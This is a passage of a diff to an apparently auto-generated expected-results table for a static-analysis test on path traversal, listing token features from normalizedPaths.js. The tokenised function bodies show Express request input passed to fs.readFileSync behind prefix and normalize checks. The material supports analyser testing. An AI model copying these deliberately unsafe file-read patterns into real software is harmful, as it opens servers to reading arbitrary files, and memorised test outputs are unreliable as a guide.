isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:203:8:203:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:203:8:203:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:203:21:203:34 | normalizedPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:203:21:203:34 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:203:21:203:34 | normalizedPath | calleeImports | fs | @@ -8610,6 +74686,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:203:21:203:34 | normalizedPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:203:21:203:34 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:203:21:203:34 | normalizedPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | exceptional return of fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | exceptional return of fs.read ... edPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | exceptional return of fs.read ... edPath) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | exceptional return of fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | exceptional return of fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | fs.read ... edPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | fs.read ... edPath) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:205:5:205:35 | fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:205:8:205:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:205:8:205:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:205:8:205:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:205:8:205:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:205:8:205:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:205:21:205:34 | normalizedPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:205:21:205:34 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:205:21:205:34 | normalizedPath | calleeImports | fs | @@ -8619,6 +74720,36 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:205:21:205:34 | normalizedPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:205:21:205:34 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:205:21:205:34 | normalizedPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:20 | normalizedPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:20 | normalizedPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:20 | normalizedPath | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:20 | normalizedPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:20 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:31 | normali ... rtsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:31 | normali ... rtsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:31 | normali ... rtsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:31 | normali ... rtsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:31 | normali ... rtsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | exceptional return of normali ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | exceptional return of normali ... r/www') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | exceptional return of normali ... r/www') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | exceptional return of normali ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | exceptional return of normali ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | normali ... r/www') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | normali ... r/www') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | normali ... r/www') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | normali ... r/www') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:49 | normali ... r/www') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:99 | normali ... ublic') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:99 | normali ... ublic') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:99 | normali ... ublic') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:99 | normali ... ublic') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:7:207:99 | normali ... ublic') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:207:22:207:31 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:22:207:31 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:207:22:207:31 | startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:22:207:31 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:22:207:31 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:207:33:207:48 | '/home/user/www' | CalleeFlexibleAccessPath | normalizedPath.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:207:33:207:48 | '/home/user/www' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:207:33:207:48 | '/home/user/www' | calleeImports | path | @@ -8628,6 +74759,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:207:33:207:48 | '/home/user/www' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:207:33:207:48 | '/home/user/www' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:207:33:207:48 | '/home/user/www' | receiverName | normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:67 | normalizedPath | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:67 | normalizedPath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:67 | normalizedPath | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:67 | normalizedPath | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:67 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:78 | normali ... rtsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:78 | normali ... rtsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:78 | normali ... rtsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:78 | normali ... rtsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:78 | normali ... rtsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | exceptional return of normali ... ublic') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | exceptional return of normali ... ublic') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | exceptional return of normali ... ublic') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | exceptional return of normali ... ublic') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | exceptional return of normali ... ublic') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | normali ... ublic') | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | normali ... ublic') | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | normali ... ublic') | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | normali ... ublic') | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:54:207:99 | normali ... ublic') | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:207:69:207:78 | startsWith | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:207:69:207:78 | startsWith | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:207:69:207:78 | startsWith | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:207:69:207:78 | startsWith | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:207:69:207:78 | startsWith | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:207:80:207:98 | '/home/user/public' | CalleeFlexibleAccessPath | normalizedPath.startsWith | | autogenerated/TaintedPath/normalizedPaths.js:207:80:207:98 | '/home/user/public' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:207:80:207:98 | '/home/user/public' | calleeImports | path | @@ -8637,6 +74793,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:207:80:207:98 | '/home/user/public' | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:207:80:207:98 | '/home/user/public' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:207:80:207:98 | '/home/user/public' | receiverName | normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:19 | fs.readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:19 | fs.readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:19 | fs.readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | exceptional return of fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | exceptional return of fs.read ... edPath) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | exceptional return of fs.read ... edPath) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | exceptional return of fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | exceptional return of fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | fs.read ... edPath) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | fs.read ... edPath) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | fs.read ... edPath) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | fs.read ... edPath) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:208:5:208:35 | fs.read ... edPath) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:208:8:208:19 | readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:208:8:208:19 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:208:8:208:19 | readFileSync | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:208:8:208:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:208:8:208:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:208:21:208:34 | normalizedPath | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:208:21:208:34 | normalizedPath | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:208:21:208:34 | normalizedPath | calleeImports | fs | @@ -8646,6 +74827,31 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:208:21:208:34 | normalizedPath | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:208:21:208:34 | normalizedPath | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:208:21:208:34 | normalizedPath | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:6 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:6 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:6 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:6 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:6 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:19 | fs.readFileSync | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:210:5:210:19 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | 